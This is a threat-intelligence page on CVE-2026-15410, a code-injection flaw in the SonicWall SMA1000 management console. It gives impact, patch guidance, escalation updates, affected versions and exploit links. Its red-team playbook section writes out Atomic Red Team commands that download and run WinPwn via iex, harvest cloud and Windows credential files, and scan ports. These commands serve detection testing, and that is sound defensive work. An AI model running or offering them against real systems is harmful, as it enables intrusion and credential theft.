CVE-2026-15410
Overview
This vulnerability is a post-authentication code injection flaw rooted in improper control over code generation within the SonicWall SMA1000 Appliance Management Console (AMC). The vulnerability arises due to insufficient validation of user-supplied input that is incorporated into command execution contexts. The affected component is the AMC interface, which processes administrative commands and configurations.
Vulnerability Description
Post-authentication improper control of generation of code ('Code Injection') vulnerability has been identified in the SMA1000 Appliance Management Console (AMC) which in specific conditions could potentially enable a remote authenticated attacker as administrator to execute arbitrary OS commands.
Impact
An attacker with valid administrator credentials can execute arbitrary operating system commands on the SMA1000 appliance, resulting in full control over the device. This includes the potential to manipulate device configurations, access sensitive data, disrupt services, or pivot laterally within the network. The prerequisite is possession of administrative-level authentication, which may be obtained through credential compromise or insider threat. The business consequence includes complete system compromise and potential network-wide security breaches.
Solution
SonicWall has released a security advisory (SNWLID-2026-0008) addressing this vulnerability in the SMA1000 Appliance Management Console. Administrators should apply the firmware update provided by SonicWall that patches this code injection flaw. Detailed patch instructions and version information are available at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008. No alternative workarounds are specified; prompt application of the vendor-supplied update is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant vulnerability has been identified in the SMA1000 Appliance Management Console (AMC), characterized by improper control over the generation of code, specifically manifesting as a code injection flaw. This vulnerability arises when the system fails to adequately validate or sanitize user inputs, allowing an authenticated attacker with administrative privileges to inject and execute arbitrary operating system commands. The implications of this flaw are severe, as it can lead to unauthorized access and manipulation of the underlying operating system, potentially compromising the entire appliance and the network it operates within.
The attack vectors associated with this vulnerability are particularly concerning due to the requirement for authentication. An attacker must first gain administrative access to the SMA1000 AMC, which could be achieved through various means such as credential theft, exploitation of weak passwords, or social engineering tactics. Once inside, the attacker can leverage the code injection vulnerability to execute arbitrary commands on the operating system. This could lead to a range of malicious activities, including data exfiltration, installation of malware, or even complete system takeover. The ability to execute commands remotely amplifies the risk, as it allows attackers to operate from a distance, evading detection while executing harmful actions.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the SMA1000 for critical operations. The potential for an attacker to gain control over the appliance poses a substantial business risk, including financial loss, reputational damage, and legal consequences stemming from data breaches or service disruptions. Organizations may face regulatory scrutiny if sensitive data is compromised, and the recovery from such an incident can be both time-consuming and costly. Furthermore, the interconnected nature of modern networks means that a successful exploitation could have cascading effects, impacting not just the vulnerable appliance but also other systems and services within the network.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including penetration testing and vulnerability scanning, can help identify weaknesses in the system before they are exploited. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel have administrative privileges to the SMA1000 AMC. Implementing robust logging and monitoring solutions can also aid in detecting suspicious activities that may indicate an attempted exploitation of the vulnerability. Furthermore, applying security patches and updates provided by the vendor is critical in closing the gap that allows for such vulnerabilities to exist.
In conclusion, the improper control of code generation in the SMA1000 Appliance Management Console presents a serious threat to organizations utilizing this product. The combination of the need for authenticated access and the potential for arbitrary command execution creates a dangerous scenario for both system integrity and data security. Organizations must remain vigilant, employing proactive measures to detect and mitigate this vulnerability while also preparing for the potential fallout should exploitation occur. By prioritizing security and maintaining awareness of emerging threats, businesses can better protect themselves against the risks posed by such vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-15410, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition by CISA underscores the vulnerability’s elevated risk profile and mandates prioritization for remediation by organizations subject to federal cybersecurity directives. Although current exploit telemetry remains limited with no confirmed active exploitation or ransomware linkage, the heightened visibility and official designation increase the likelihood of targeted attacks emerging imminently. The updated CVSS score of 7.2 reflects the vulnerability’s potential impact, particularly given its post-authentication code injection vector on SonicWall SMA1000 appliances, which could facilitate unauthorized command execution with administrative privileges. Consequently, the threat level has shifted from theoretical concern to a credible and actionable risk, demanding increased vigilance from defenders monitoring for exploitation attempts and preparing for potential incident response scenarios.
Update 2 — July 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity targeting CVE-2026-15410, with a significant surge in exploitation attempts observed across our telemetry. This increase coincides with the emergence of publicly available proof-of-concept exploit code on GitHub, broadening the accessibility of attack methods to a wider range of threat actors. The vulnerability’s Exploit Prediction Scoring System (EPSS) score has risen substantially, indicating a growing likelihood of exploitation in the wild. These developments suggest that adversaries are rapidly advancing their capabilities to leverage this post-authentication code injection flaw in SonicWall SMA1000 appliances. The expanded exploit landscape and heightened detection frequency elevate the threat level from a theoretical concern to an active and credible risk, underscoring the urgency for defenders to enhance monitoring and detection efforts. While ransomware involvement remains unconfirmed, the increased exploitation potential could facilitate lateral movement or privilege escalation in targeted environments, amplifying the overall impact of successful compromises.
Update 3 — August 14, 2026
CSURFACE threat intelligence has identified critical developments in the exploitation landscape of CVE-2026-15410. The emergence of a Metasploit module has significantly lowered the technical barrier for adversaries to execute arbitrary OS commands post-authentication on SonicWall SMA1000 appliances. This shift is reflected in a marked increase in the Exploit Prediction Scoring System (EPSS) score, now placing the vulnerability in the 99th percentile for exploitation likelihood. Our telemetry indicates a slight but consistent rise in detection activity, signaling growing adversary interest and operational use. Notably, ransomware actors, specifically the Sinobi group, have been linked to campaigns leveraging this vulnerability, confirming its weaponization in financially motivated attacks. This association elevates the threat from a primarily theoretical or opportunistic risk to a credible vector for ransomware intrusion and lateral movement within compromised networks. Consequently, the overall threat level is heightened, underscoring the urgency for defenders to prioritize monitoring for exploitation attempts and to reassess risk postures related to SonicWall SMA1000 deployments.
Affected Products (18)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sma8200v | 12.4.3-03245 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.4.3-03387 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.4.3-03434 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02283 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02624 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02800 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02800:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03245 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03387 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03434 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02283 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02624 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02800 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02800:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03245 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03387 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03434 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02283 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02624 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02800 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02800:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SonicWall SMA1000 WorkPlace wsproxy SSRF Remote Command Execution
exploits/linux/http/sonicwall_sma1000_wsproxy_rce
|
Ryan Emmons, Deral Heiland, Rapid7 Vulnerability Research | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
HORKimhab/CVE-2026-15410
CVE-2026-15410 - More: https://github.com/HORKimhab/poc-cve-collection
|
HORKimhab | 0 | 0 | 2026-07-15 | View |
Threat Feed
28 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-15410 |
| psirt.global.sonicwall.com |
GitHub CVE
vendor-advisory
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008 |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410 |